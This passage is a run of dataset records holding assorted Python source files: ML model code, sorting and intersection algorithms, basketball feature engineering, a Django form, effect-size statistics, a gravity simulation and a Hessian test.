'validation'], loc='upper left')\n#plt.show()\n# Save plot as PNG file\nfig.savefig('Accuracy_Curves_MLP_Librosa_Complete_Clean.png')\n\n# Plot the training and validation losses vs. epochs for the latest loop iteration\nfig = plt.figure()\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('MLP_Custom_Complete_Clean')\nplt.grid()\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\n#plt.show()\n# Save plot as PNG file\nfig.savefig('Loss_Curves_MLP_Librosa_Complete_Clean.png')\n\nt_2 = time.perf_counter()\n\nprint('Time taken to execute code: % seconds' % (t_2-t_1))\n","sub_path":"MLP/MLP_Complete_results.py","file_name":"MLP_Complete_results.py","file_ext":"py","file_size_in_byte":8539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"322008683","text":"import torch.nn as nn\nimport torch\n\nfrom models import HybridCNN, Generator, Discriminator, ConditionAugmentation\n\n#param \n_cnn_dim = 1024\n_rnn_layers = 1\nclass StackGANWithEncoder(nn.Module):\n def __init__(self, alphasize, condition_dim, condition_embedding_dim, \n z_dim, image_dim, image_channel, cuda_enable, batch_size):\n super(StackGANWithEncoder, self).__init__()\n self.params = locals().copy()\n self.TextEncoder = HybridCNN(alphasize, condition_dim, \n _cnn_dim, _rnn_layers, cuda_enable=cuda_enable, batch_size=batch_size)\n self.CA = ConditionAugmentation(condition_dim, condition_embedding_dim, cuda_enable)\n self.generator = Generator(z_dim, condition_embedding_dim, image_dim, image_channel)\n self.discriminator = Discriminator(condition_embedding_dim, image_dim, image_channel)\n \n def forward_TextEnc(self, text_onehot):\n return self.TextEncoder(text_onehot)\n\n def forward_G(self, text_embedding):\n return self.generator(text_embedding)\n \n def forward_D(self, image):\n return self.discriminator(image)\n \n @staticmethod\n def weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n elif classname.find('Linear') != -1:\n m.weight.data.normal_(0.0, 0.02)\n if m.bias is not None:\n 
m.bias.data.fill_(0.0)\n\n    @staticmethod\n    def save_model(model, save_path):\n        save_dict = {\n            \"params\": model.params,\n            \"state_dict\": model.state_dict()\n        }\n        torch.save(save_dict, save_path)\n\n    @staticmethod\n    def load_model(load_path):\n        load_dict = torch.load(load_path)\n        model = StackGANWithEncoder(\n            **(load_dict[\"params\"])\n        )\n        model.load_state_dict(load_dict[\"state_dict\"])\n        return model\n","sub_path":"StackGANWithEncoder/StackGANWithEncoder.py","file_name":"StackGANWithEncoder.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"}
{"seq_id":"154006592","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Mike\n# @Contact : 597290963@qq.com\n# @Time : 2021/2/2 22:38\n# @File : Intersect.py\n\"\"\"\nGiven two arrays, write a function to compute their intersection.\n\"\"\"\nfrom typing import List\n\n\nclass Intersect(object):\n\n    def __init__(self):\n        pass\n\n    def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n        \"\"\"\n        Intersection via sorting plus two pointers. This also scales to large data sets:\n        swap the sort for a merge sort and read the two files with two pointers, comparing as you go.\n\n        Time complexity O(max(logN, logM, M + N))\n        Space complexity O(min(N, M))\n        :param nums1:\n        :param nums2:\n        :return:\n        \"\"\"\n        nums1.sort()\n        nums2.sort()\n        intersect_result = []\n        left, right = 0, 0\n        while left < len(nums1) and right < len(nums2):\n            if nums1[left] < nums2[right]:\n                left += 1\n            elif nums1[left] == nums2[right]:\n                intersect_result.append(nums1[left])\n                left += 1\n                right += 1\n            else:\n                right += 1\n\n        return intersect_result\n\n    def intersect1(self, nums1: List[int], nums2: List[int]) -> List[int]:\n        \"\"\"\n        Hash table approach\n        :param nums1:\n        :param nums2:\n        :return:\n        \"\"\"\n        hash_map = dict()\n        for i in range(len(nums1)):\n            hash_map.setdefault(nums1[i], 0)\n            hash_map[nums1[i]] += 1\n\n        intersect_result = []\n        for j in range(len(nums2)):\n            if hash_map.get(nums2[j], 0) > 0:\n                intersect_result.append(nums2[j])\n                hash_map[nums2[j]] -= 1\n                if hash_map[nums2[j]] == 0:\n                    hash_map.pop(nums2[j])\n\n        return intersect_result\n\n\nif __name__ == '__main__':\n    print(Intersect().intersect(nums1=[4, 9, 5], nums2=[9, 4, 9, 8, 4]))\n","sub_path":"datastructure/hash_table/Intersect.py","file_name":"Intersect.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"}
{"seq_id":"492843238","text":"import numpy as np\n\n# gpu libraries\nimport torch\nfrom torchvision.utils import make_grid\n\ndef reconstruct(E,G,img):\n    z,mu,logvar = E(img.view(1,3,32,32), False)\n    return G(z).detach()\n\ndef viz_image_list(imglist, nrow=8):\n    ims = torch.cat(imglist)\n    grid = make_grid(ims, nrow=nrow)\n    img_np = grid.numpy()\n    return np.transpose(img_np, (1,2,0))\n\ndef interpolate(A, B, r, E, G, k=3, eps=0,nz=10):\n    za, mua, logvara = E(A.view(1,3,32,32), False)\n    zb, mub, logvarb = E(B.view(1,3,32,32), False)\n    mu_int = mua*r + mub*(1-r)\n    z_int = mu_int + torch.randn(1,nz,1,1)*eps\n    return G(z_int).detach()\n\ndef interpolate_topk(A, B, r, E, G, k=3, eps=0, nz=10):\n    za, mua, logvara = E(A.view(1,3,32,32), False)\n    zb, mub, logvarb = E(B.view(1,3,32,32), False)\n    mu_int = mua.clone()\n    mu_int[:,0:k,0,0] = mua[:,0:k,0,0]*r + mub[:,0:k,0,0]*(1-r)\n    z_int = mu_int + torch.randn(1,nz,1,1)*eps\n    return G(z_int).detach()\n\ndef interpolate_botk(A,B,r,E,G,k=3, eps=0, nz=10):\n    za, mua, logvara = E(A.view(1,3,32,32), False)\n    zb, mub, logvarb = E(B.view(1,3,32,32), False)\n    mu_int = mua.clone()\n    mu_int[:,k:,0,0] = mua[:,k:,0,0]*r + mub[:,k:,0,0]*(1-r)\n    z_int = mu_int + torch.randn(1,nz,1,1)*eps\n    return 
G(z_int).detach()","sub_path":"viz_utils.py","file_name":"viz_utils.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"620029477","text":"from time import time\nimport os\n\ndef InsertionSort(A):\n\n inicio = time()\n\n for i in range(1, len(A)):\n j = i-1\n while j >= 0 and A[j] > A[j+1]:\n aux = A[j]\n A[j] = A[j+1]\n A[j+1] = aux\n j = j-1\n\n final = time()\n tiempo_ejecucion = (final-inicio)*1000\n\n return tiempo_ejecucion\n\n\n\n\n\n\nif __name__ == \"__main__\":\n \n cont = 0\n\n print('Insertion Sort Algorithm')\n\n for i in range(1000, 10000+1, 1000):\n cmd = \"python worst_case_script.py \" +str(i) \n os.system(cmd)\n cont += 1\n print('Archivo {} creado'.format(cont))\n\n\n dato1 = open('datos1_worst_case.txt', 'w')\n\n for i in range(1000, 10000+1, 1000):\n\n A = []\n file_name = 'worst_'+str(i)+'.txt'\n\n f = open(file_name, 'r')\n for x in f:\n A.append(int(x))\n\n tiempo_ejecucion = InsertionSort(A)\n dato1.write(str(i)+' '+str(tiempo_ejecucion)+'\\n')\n \n print('Archivo Creado')\n","sub_path":"Practica1/Parte1/Worst_case/Insertion-Sort.py","file_name":"Insertion-Sort.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"497117347","text":"import pandas as pd\nimport numpy as np\nimport pdb\n\n\ndef name_cleanup(df):\n ''' Input: Dataframe with each row being a game and both home and away team season previous stats calculated\n Output: Dataframe in same form with labels names\n '''\n df.rename(index = str, columns={'home_point_spread':'label_h_point_spread','home_winner':'label_home_winner'}, inplace=True)\n return df\n\ndef shooting(df):\n ''' Input: Dataframe with each row being a game and both home and away team season previous stats calculated\n Output: Dataframe in same form with shooting percentage calculated for home and away teams\n '''\n #FG %\n df['home_fgpct'] = df['home_fgmpg']/df['home_fgapg']\n df['away_fgpct'] = df['away_fgmpg']/df['away_fgapg']\n #3p%\n df['home_3ppct'] = df['home_3pmpg']/df['home_3papg']\n df['away_3ppct'] = df['away_3pmpg']/df['away_3papg']\n #FT%\n df['home_ftpct'] = df['home_ftmpg']/df['home_ftapg']\n df['away_ftpct'] = df['away_ftmpg']/df['away_ftapg']\n #EFG%\n df['home_efgpct'] = (df['home_fgmpg']+.5*df['home_3pmpg'])/df['home_fgapg']\n df['away_efgpct'] = (df['away_fgmpg']+.5*df['away_3pmpg'])/df['away_fgapg']\n #dropping unneeded columns\n df.drop(['home_fgmpg','away_fgmpg','home_3pmpg','away_3pmpg'], axis = 1,inplace=True)\n return df\n\ndef record(df):\n ''' Input: Dataframe with each row being a game and both home and away team season previous stats calculated\n Output: Dataframe in same form with W-L record stats calculated for home and away teams\n '''\n #calculating winning percentage for teams\n #Home team\n df['hometeam_wins'] = df['home_wins_home'] + df['away_games_home'] - df['away_losses_home']\n df['hometeam_games'] = df['home_games_home'] + df['away_games_home']\n df['hometeam_wp'] = df['hometeam_wins']/df['hometeam_games']\n df['hometeam_homewp'] = df['home_wins_home']/df['home_games_home']\n #Away team\n df['awayteam_wins'] = df['home_wins_away'] + df['away_games_away'] - df['away_losses_away']\n df['awayteam_games'] = df['home_games_away'] + df['away_games_away']\n df['awayteam_wp'] = df['awayteam_wins']/df['awayteam_games']\n df['awayteam_awaywp'] = 1-(df['away_losses_away']/df['away_games_away'])\n #dropping unneeded 
columns\n df.drop(['home_wins_home','away_losses_home','home_wins_away','away_losses_away'], axis = 1,inplace=True)\n return df\n\ndef point_spread(df):\n ''' Input: Dataframe with each row being a game and both home and away team season previous stats calculated\n Output: Dataframe in same form with point spread stats calculated for home and away teams\n '''\n #Avg points spread in games\n #Home\n df['hometeam_pt_sprd'] = ((df['home_games_home'] * df['home_ps_home'])+(df['away_games_home'] * df['away_ps_home']))/df['hometeam_games']\n df['hometeam_opp_ppg'] = df['home_ppg'] - df['hometeam_pt_sprd']\n #Away\n df['awayteam_pt_sprd'] = ((df['home_games_away'] * df['home_ps_away'])+(df['away_games_away'] * df['away_ps_away']))/df['awayteam_games']\n df['awayteam_opp_ppg'] = df['away_ppg'] - df['awayteam_pt_sprd']\n #Pythagorean expected wins\n df['home_pyth_wd'] = df['hometeam_wins'] - df['hometeam_games'] * (df['home_ppg']**14)/((df['home_ppg']**14)+(df['hometeam_opp_ppg']**14))\n df['away_pyth_wd'] = df['awayteam_wins'] - df['awayteam_games'] * (df['away_ppg']**14)/((df['away_ppg']**14)+(df['awayteam_opp_ppg']**14))\n\n #Point Spread Variance\n df['hometeam_ps_var'] = ((df['hometeam_games']-1)*(df['home_ps_var_home']+df['away_ps_var_home'])+((df['hometeam_games']/2)*((df['home_ps_home']-df['away_ps_home'])**2)))/(2*df['hometeam_games']-1)\n df['awayteam_ps_var'] = ((df['awayteam_games']-1)*(df['home_ps_var_away']+df['away_ps_var_away'])+((df['awayteam_games']/2)*((df['home_ps_away']-df['away_ps_away'])**2)))/(2*df['awayteam_games']-1)\n df.drop(['hometeam_games', 'hometeam_wins','awayteam_games','awayteam_wins','home_ps_var_home', 'away_games_home', 'away_ps_home','away_ps_var_home', 'home_games_away', 'home_ps_away','home_ps_var_away', 'away_games_away','away_ps_var_away','home_games_home'],axis=1, inplace=True)\n return df\n\ndef misc_features(df):\n ''' Input: Dataframe with each row being a game and both home and away team season previous stats calculated\n Output: Dataframe in same form with other stats calculated for home and away teams\n '''\n #Turnover percent - one of four factors\n df['home_tovpct'] = df['home_topg']/(df['home_fgapg'] + 0.44 * df['home_ftapg'] + df['home_topg'])\n df['away_tovpct'] = df['away_topg']/(df['away_fgapg'] + 0.44 * df['away_ftapg'] + df['away_topg'])\n #Free throw factor - another predictor\n df['home_ft_factor'] = df['home_ftmpg']/df['home_fgapg']\n df['away_ft_factor'] = df['away_ftmpg']/df['away_fgapg']\n #Pace - avg possessions per game\n df['home_pace'] = df['home_fgapg'] - df['home_orebpg'] + df['home_topg']\n df['away_pace'] = df['away_fgapg'] - df['away_orebpg'] + df['away_topg']\n df.drop(['home_ftmpg','away_ftmpg','home_trebpg','away_trebpg','home_topg','away_topg'],axis=1, inplace=True)\n return df\n\ndef home_minus_away(df,varlst):\n ''' Input: Dataframe with home and away stats\n Output: Dataframe with home stats minus away stats\n '''\n df2 = df.copy()\n for var in varlst:\n df2['diff{}'.format(var)] = df['home{}'.format(var)] - df['away{}'.format(var)]\n df2.drop(['home{}'.format(var),'away{}'.format(var)], axis=1, inplace=True)\n return df2\n\ndef per_possession(df,varlist):\n df3 = df.copy()\n for var in varlist:\n for ha in ['home_','away_']:\n df3['{0}{1}_perposs'.format(ha,var)] = df['{0}{1}pg'.format(ha,var)]/df['{}pace'.format(ha)]\n df3.drop(['{0}{1}pg'.format(ha,var)], axis=1, inplace=True)\n df3.drop(['home_pace','away_pace'], axis=1,inplace=True)\n return df3\n\ndef polynomial(df):\n df['hpsq'] = df['hometeam_pt_sprd']**2\n 
df['apsq'] = df['awayteam_pt_sprd']**2\n return df\n\n\ndef split_seasons(df):\n '''\n INPUT: pandas dataframe with player stats\n OUTPUT: 2 dataframes split between regular season and March Madness games.\n =========================================================================\n This will be our train/test split for each season\n Thank you to Steve Iannaccone for this dictionary - and some of the code\n '''\n TourneyDates = {2007: '2007-03-11',\n 2008: '2008-03-18',\n 2009: '2009-03-17',\n 2010: '2010-03-16',\n 2011: '2011-03-15',\n 2012: '2012-03-13',\n 2013: '2013-03-19',\n 2014: '2014-03-18',\n 2015: '2015-03-17',\n 2016: '2016-03-15',\n 2017: '2017-03-14',\n 2018: '2018-03-13'}\n df['madness_date'] = df['year'].map(TourneyDates)\n df_reg = df[df['DATE_STRING'] < df['madness_date']].reset_index()\n df_tourney = df[df['DATE_STRING'] >= df['madness_date']].reset_index()\n df_reg.drop(['level_0','index','madness_date','DATE_STRING','DATE','Home','Away','month'],axis=1, inplace=True)\n df_tourney.drop(['level_0','index','madness_date','DATE_STRING','month'],axis=1, inplace=True)\n return df_reg, df_tourney\n\nif __name__ == \"__main__\":\n #Feature engineering\n df = pd.read_pickle('data/modeling_db1.pkl')\n df = name_cleanup(df)\n df = shooting(df)\n df = record(df)\n df = point_spread(df)\n df = misc_features(df)\n df.dropna(inplace=True)\n df.to_pickle('data/modeling_whole.pkl')\n\n #creating train-test split on regular data\n df_reg1, df_tourney1 = split_seasons(df)\n df_reg1.to_pickle('data/reg_model_data_final1.pkl')\n df_tourney1.to_pickle('data/tourney_model_data_final1.pkl')\n\n #creating train-test split on home-minus away database\n varlist = ['_bpg','_drebpg','_orebpg','_foulpg','_ppg','_stlpg','_3papg','_fgapg','_ftapg','_apg','_fgp_var','_ppg_var','_fgpct','_3ppct','_ftpct','_efgpct','team_wp','team_pt_sprd','team_opp_ppg','team_ps_var','_tovpct','_ft_factor','_pace','_pyth_wd']\n df2 = home_minus_away(df, varlist)\n df2.to_pickle('data/modeling_homeaway.pkl')\n df_reg2, df_tourney2 = split_seasons(df2)\n df_reg2.to_pickle('data/reg_model_data_final_homeaway.pkl')\n df_tourney2.to_pickle('data/tourney_model_data_final_homeaway.pkl')\n\n #Creating more advanced stats in 3rd df\n varlist2 = ['dreb','oreb','foul','p','stl','3pa', 'fga', 'fta', 'a', 'b']\n df3 = per_possession(df,varlist2)\n df3 = polynomial(df3)\n df_reg3, df_tourney3 = split_seasons(df3)\n df_reg3.to_pickle('data/reg_model_data_final3.pkl')\n df_tourney3.to_pickle('data/tourney_model_data_final3.pkl')\n","sub_path":"src/feature_eng.py","file_name":"feature_eng.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"498694158","text":"from django import forms\nfrom django.forms import ModelForm, Textarea\nfrom .models import *\nfrom django.utils.translation import gettext_lazy as _\n\nSELL_CHOICES = [\n ('sell', 'Sell'),\n ('rent_monthly', 'Rent Monthly'),\n ('rent_weekly', 'Rent Weekly'),\n]\n\n\nclass Item(forms.ModelForm):\n description = forms.Textarea\n price = models.FloatField()\n category = forms.CharField(max_length=255, widget=forms.Select(choices=CATEGORY_CHOICES), )\n status = models.IntegerField(default=0)\n sell = forms.ChoiceField(choices=SELL_CHOICES)\n Img1 = models.ImageField(upload_to='images/', default='images/no-image.jpg')\n Img2 = models.ImageField(upload_to='images/', default='images/no-image.jpg')\n Img3 = models.ImageField(upload_to='images/', default='images/no-image.jpg')\n\n class Meta:\n 
model = Products\n fields = ['name', 'description', 'sell', 'price', 'category', 'Img1', 'Img2', 'Img3']\n labels = {\n 'name': _('Product Title'),\n 'description': _('Product Description'),\n 'price': _('Selling/Rental Price'),\n 'category': _('Product Category'),\n 'Img1': _('Upload Image 1'),\n 'Img2': _('Upload Image 2 (Optional)'),\n 'Img3': _('Upload Image 3 (Optional)'),\n 'sell': _('Sell or Rent'),\n }\n widgets = {\n\n }\n\n\nclass Edit_Item(forms.ModelForm):\n name = forms.CharField(max_length=255, widget=forms.TextInput(attrs={'readonly':'readonly'}))\n description = forms.Textarea\n price = models.FloatField()\n category = forms.CharField(max_length=255, widget=forms.Select(choices=CATEGORY_CHOICES), )\n status = models.IntegerField(default=0)\n sell = forms.ChoiceField(choices=SELL_CHOICES)\n\n class Meta:\n model = Products\n fields = ['name', 'description', 'sell', 'price', 'category']\n labels = {\n 'name': _('Edit Name'),\n 'description': _('Edit Description'),\n 'price': _('Selling/Rental Price'),\n 'category': _('Change Category'),\n 'sell': _('Sell or Rent'),\n }\n widgets = {\n\n }\n\n","sub_path":"products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"343884573","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 25 10:47:12 2020\n\n@author: L\n\nthere are at least 5 different and non-equivalent ways that people might \ncompute a d-like effect size (which they would invariably simply call “Cohen’s d”) \n... and the resulting effect sizes range from about 0.25 to 1.91.\n\nUseful links\nhttps://cran.r-project.org/web/packages/effectsize/effectsize.pdf\nhttp://jakewestfall.org/blog/index.php/2016/03/25/five-different-cohens-d-statistics-for-within-subject-designs/\nhttp://jeffrouder.blogspot.com/2016/03/the-effect-size-puzzler-answer.html\nhttps://forum.cogsci.nl/discussion/3013/what-denominator-does-the-cohens-d-use-on-jasp\nhttps://www.uv.es/uvetica/files/Cunningham_McCrum_Gardner2007.pdf\nhttps://github.com/mtorchiano/effsize/blob/master/R/CohenD.R\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nfrom statsmodels.stats import weightstats as sms\nfrom statsmodels.stats.anova import AnovaRM\nfrom statsmodels.formula.api import ols\nfrom scipy import stats\n\n\n\n\n#~Testing Dataset ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n# Artificial movie ratings dataset\nx1 = [9, 7, 8, 9, 8, 9, 9, 10, 9, 9]\nx2 = [9, 6, 7, 8, 7, 9, 8, 8, 8, 7]\ndf = pd.DataFrame({'movie_1': x1,\n 'movie_2': x2})\ndf['difference'] = df['movie_1'] - df['movie_2']\ndfs = df[['movie_1', 'movie_2']].stack().reset_index()\nprint(df, '\\n')\n\nnobs_x1, nobs_x2 = np.size(x1), np.size(x2)\n\n\n#~ Dependent Groups / Within Samples ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\ndef cohens_d(x1=None, x2=None, S_x1=None, S_x2=None, ind=True, r=None, hedges_correction=False, nobs_x1=None, nobs_x2=None):\n \n realval_check = (int, float, np.float16, np.float32, np.float64)\n if isinstance(x1, realval_check) and isinstance(x2, realval_check):\n x1, x2 = [x1], [x2]\n \n \n x1, x2 = np.array(x1), np.array(x2)\n mean_x1, mean_x2 = np.mean(x1), np.mean(x2) # if means provided as x1,x2, then these will return the same vals.\n meandiff = mean_x1 - mean_x2\n \n if len(x1)==1 and len(x2)==1:\n # Then just the means were provided: we need both SDs otherwise error.\n if not (S_x1 and S_x2):\n raise ValueError(\"Requires both of `S_x1` & 
`S_x2`.\")\n else:\n from_summary = True\n else:\n # Then x1 and x2 are arrays and we proceed as usual\n from_summary = False\n S_x1, S_x2 = np.std(x1, ddof=1), np.std(x2, ddof=1)\n nobs_x1, nobs_x2 = len(x1), len(x2)\n \n if ind == True:\n # Independent samples \n if (from_summary == True) and (not (nobs_x1 and nobs_x2)):\n # Estimating using different pooled SD e.g. https://www.polyu.edu.hk/mm/effectsizefaqs/effect_size_equations2.html\n pooled_sd = np.sqrt((S_x1**2 + S_x2**2) / 2)\n print(pooled_sd)\n else:\n \n dof = nobs_x1 + nobs_x2 - 2\n pooled_sd = np.sqrt( ((nobs_x1 - 1) * S_x1 ** 2 + (nobs_x2 - 1) * S_x2 ** 2) / dof )\n \n else:\n # Related samples\n if from_summary == True:\n if not r: \n # We need the coefficient otherwise it is biased. Maybe just raise warning and use biased cohens d?\n raise ValueError(\"Correlation coefficient `r` required to compute effect size from summary statistics, but was not provided.\")\n else:\n # Need to compute r from x1 and x2 arrays\n r = np.corrcoef(x1, x2)[0][1]\n \n pooled_sd = np.sqrt(S_x1**2 + S_x2**2 - 2 * r * S_x1 * S_x2)\n # pooled_sd = np.mean([S_x1, S_x2]) # Hedges' g (average)\n \n # Calculate the effect size\n effectsize = meandiff / pooled_sd\n \n if hedges_correction:\n if (from_summary == True) and (not (nobs_x1 and nobs_x2)):\n raise ValueError(\"Requires number of observations from both groups in order to apply Hedges' correction, but these were not provided.\")\n else:\n if ind == False:\n # Re-calculate the effect size with the average pooled stdev\n effectsize = meandiff / np.mean([S_x1, S_x2])\n \n effectsize *= (1 - (3 / (4 * (nobs_x1 + nobs_x2) - 9)))\n \n return effectsize\n \n\n\n# Cohen's d calcs\nd_s_ind = cohens_d(x1, x2)\nd_s_rel = cohens_d(x1, x2, ind=False)\nd_s_ind_summary = cohens_d(np.mean(x1), np.mean(x2), np.std(x1, ddof=1), np.std(x2, ddof=1))\nd_s_rel_summary = cohens_d(np.mean(x1), np.mean(x2), np.std(x1, ddof=1), np.std(x2, ddof=1), r=0.73)\n\n# Hedges' g correction for Cohen's d\nd_s_ind_g = cohens_d(x1, x2, hedges_correction=True)\nd_s_rel_g = cohens_d(x1, x2, ind=False, hedges_correction=True)\nd_s_ind_summary_g = cohens_d(np.mean(x1), np.mean(x2), np.std(x1, ddof=1), np.std(x2, ddof=1), \n nobs_x1=10, nobs_x2=10, hedges_correction=True)\nd_s_rel_summary_g = cohens_d(np.mean(x1), np.mean(x2), np.std(x1, ddof=1), np.std(x2, ddof=1), \n nobs_x1=10, nobs_x2=10, r=0.73, hedges_correction=True)\n\n# Test them against the examples\nnp.testing.assert_allclose(round(d_s_ind, 2), 1.13) # from the paper\nnp.testing.assert_allclose(round(d_s_rel, 2), 1.5) # from the paper\nnp.testing.assert_allclose(round(d_s_ind_summary, 2), 1.13) # tested with g*power\nnp.testing.assert_allclose(round(d_s_rel_summary, 2), 1.13) # tested from here ---> https://www.socscistatistics.com/effectsize/default3.aspx\nnp.testing.assert_allclose(round(d_s_ind_g, 2), 1.08) # from the paper\nnp.testing.assert_allclose(round(d_s_rel_g, 2), 1.08) # from the paper\nnp.testing.assert_allclose(round(d_s_ind_summary_g, 2), 1.08) # tested from here ---> https://www.socscistatistics.com/effectsize/default3.aspx\nnp.testing.assert_allclose(round(d_s_rel_summary_g, 2), 1.08) # tested from here ---> https://www.socscistatistics.com/effectsize/default3.aspx\n\n\nprint(f\"Cohens d from independent samples data: {d_s_ind}\")\nprint(f\"Cohens d from paired samples data: {d_s_rel}\")\nprint(f\"Cohens d from independent samples data using summary stats: {d_s_ind_summary}\")\nprint(f\"Cohens d from paired samples data using summary stats: 
{d_s_rel_summary}\")\n\nprint(f\"Hedges g from independent samples data: {d_s_ind_g}\")\nprint(f\"Hedges g from paired samples data: {d_s_rel_g}\")\nprint(f\"Hedges g from independent samples data using summary stats: {d_s_ind_summary_g}\")\nprint(f\"Hedges g from paired samples data using summary stats: {d_s_rel_summary_g}\")\n\nprint(df.describe())\n","sub_path":"statistics/effect_sizes.py","file_name":"effect_sizes.py","file_ext":"py","file_size_in_byte":6458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"95981518","text":"# -*- coding: utf-8 -*-\nimport os\n\nadmins = ['Tyranic-Moron', 'T-M|Work', 'Tyranic_Moron', 'T-M|Asleep', 'GarrusVakarian', 'LordCustardSmingleigh', 'XelaReko', 'XelaReco', 'dave_random', 'ElementalAlchemist', 'Homoglyph', 'Heufy|Work', 'Heufneutje', 'Mara']\n\nfinger = 'GET YOUR FINGER OUT OF THERE'\nversion = '0.7.0' # 3 major features left to implement before I'll consider it 1.0.0 (listed below)\n# Unified command data storage (may decide not to bother, independent also works and has its own benefits)\n# Command Aliasing\n# Command Chaining\nsource = 'https://github.com/MatthewCox/PyMoronBot/'\n\nabspath = os.path.abspath(__file__)\ndname = os.path.dirname(abspath)\nos.chdir(dname)\nlogPath = os.path.join(dname, 'logs')\n","sub_path":"GlobalVars.py","file_name":"GlobalVars.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"14026412","text":"from OpenGL.GLUT import *\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\n\r\nimport random\r\nimport numpy as np\r\n\r\nfrom TUGameEngine import TUGame\r\n\r\nclass myGame(TUGame.Game):\r\n def __init__(self, w, h, title):\r\n super().__init__(w, h, title)\r\n\r\n self.loc = []\r\n self.vel = []\r\n self.mass = []\r\n self.force = []\r\n self.loc.append(np.array([-15., 5., 0.])) #append : puts a value into the list\r\n self.loc.append(np.array([15., -5., 0.]))\r\n self.vel.append(np.array([5., 0., 0.]))\r\n self.vel.append(np.array([-5., 0., 0.]))\r\n self.mass.append(1.0)\r\n self.mass.append(20.0)\r\n self.force.append(np.array([0., 0., 0.]))\r\n self.force.append(np.array([0., 0., 0.]))\r\n\r\n self.cameraAt([0, 0, 50], [0, 0, 0])\r\n\r\n # self.setBackground(b\"background.jpg\")\r\n\r\n def initObjects(self): #reset the objects to their initial state\r\n self.loc[0] = np.array([-15., 5., 0.])\r\n self.loc[1] = np.array([15., -5., 0.])\r\n self.vel[0] = np.array([5., 0., 0.])\r\n self.vel[1] = np.array([-5., 0., 0.])\r\n\r\n def frame(self):\r\n\r\n dt = self.getDt()\r\n\r\n super().frame()\r\n # your code here\r\n G = 100 #gravitational constant\r\n m = [self.mass[0], self.mass[1]]\r\n x01 = self.loc[1] - self.loc[0]\r\n dist = np.linalg.norm(x01) #linalg.norm : returns the length of a vector ##distance between the two objects\r\n fdir = [x01/dist, -x01/dist] #direction of the force\r\n mg = G * m[0] * m[1] / dist**2 #universal gravitational force\r\n\r\n # compute force\r\n for i in range(0, 2):\r\n self.force[i] = fdir[i] * mg ##multiply the gravitational force by its direction to build the force vector\r\n\r\n # simulate with the force\r\n for i in range(0, 2):\r\n self.vel[i] += self.force[i] * dt / m[i] #acceleration is the time derivative of velocity ##we integrate acceleration, not force\r\n self.loc[i] += self.vel[i] * dt\r\n\r\n for balls in self.loc: # == for i in range(2):\r\n self.drawBall(balls) #self.drawBall(self.loc[i])\r\n\r\n super().afterFrame()\r\n\r\ngame = myGame(500, 500, b\"gravity\")\r\ngame.grid(True)\r\n\r\ndef key(k, x, y):\r\n if k == b' ':\r\n if game.timer.timerRunning:\r\n game.timerStop()\r\n else:\r\n game.timerStart()\r\n elif k == b'r':\r\n 
game.timerReset()\r\n game.initObjects()\r\n\r\ndef draw():\r\n game.frame()\r\n\r\n\r\ngame.start(draw, key)","sub_path":"05_TwoObject.py","file_name":"05_TwoObject.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"499729816","text":"import numpy\nimport nuctools\n\nimport os\nfrom numpy.testing import assert_almost_equal\n\n\ndata_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'files')\npattern = open(os.path.join(data_path, 'hessian.pattern')).read()\nstring = open(os.path.join(data_path, 'hessian.out')).read()\ndata = nuctools.iohelp.float_array(\n nuctools.iohelp.find(pattern, string))\n\nix = nuctools.iohelp.cframe.ix_tril(n=9, w=5)\nhess_tril = nuctools.math.array(shape=(9, 9), ix=ix, data=data)\nhessian = hess_tril + numpy.tril(hess_tril, k=-1).T\n\nhessian_ref = numpy.loadtxt(os.path.join(data_path, 'hessian.txt'))\nassert_almost_equal(hessian, hessian_ref, decimal=10)\n\n# PROJECTION\nLABELS = ('o', 'h', 'h')\nCOORDS = ((0.0000000000, 0.0000000000, -0.1247219248),\n (0.0000000000, -1.4343021349, 0.9864370414),\n (0.0000000000, 1.4343021349, 0.9864370414))\ncoords = nuctools.mol.centered_coordinates(labels=LABELS, coords=COORDS)\n\naxes = nuctools.mol.filtered_inertia_axes(labels=LABELS, coords=COORDS)\n\nmasses = nuctools.mol.masses(labels=LABELS)\ne_t = nuctools.mol.translations(masses=masses, axes=axes)\ne_r = nuctools.mol.rotations(masses=masses, coords=coords, axes=axes)\ne_tr = numpy.hstack((e_t, e_r))\n\nprint(numpy.dot(e_tr.T, e_tr).round(10))\n\nm = 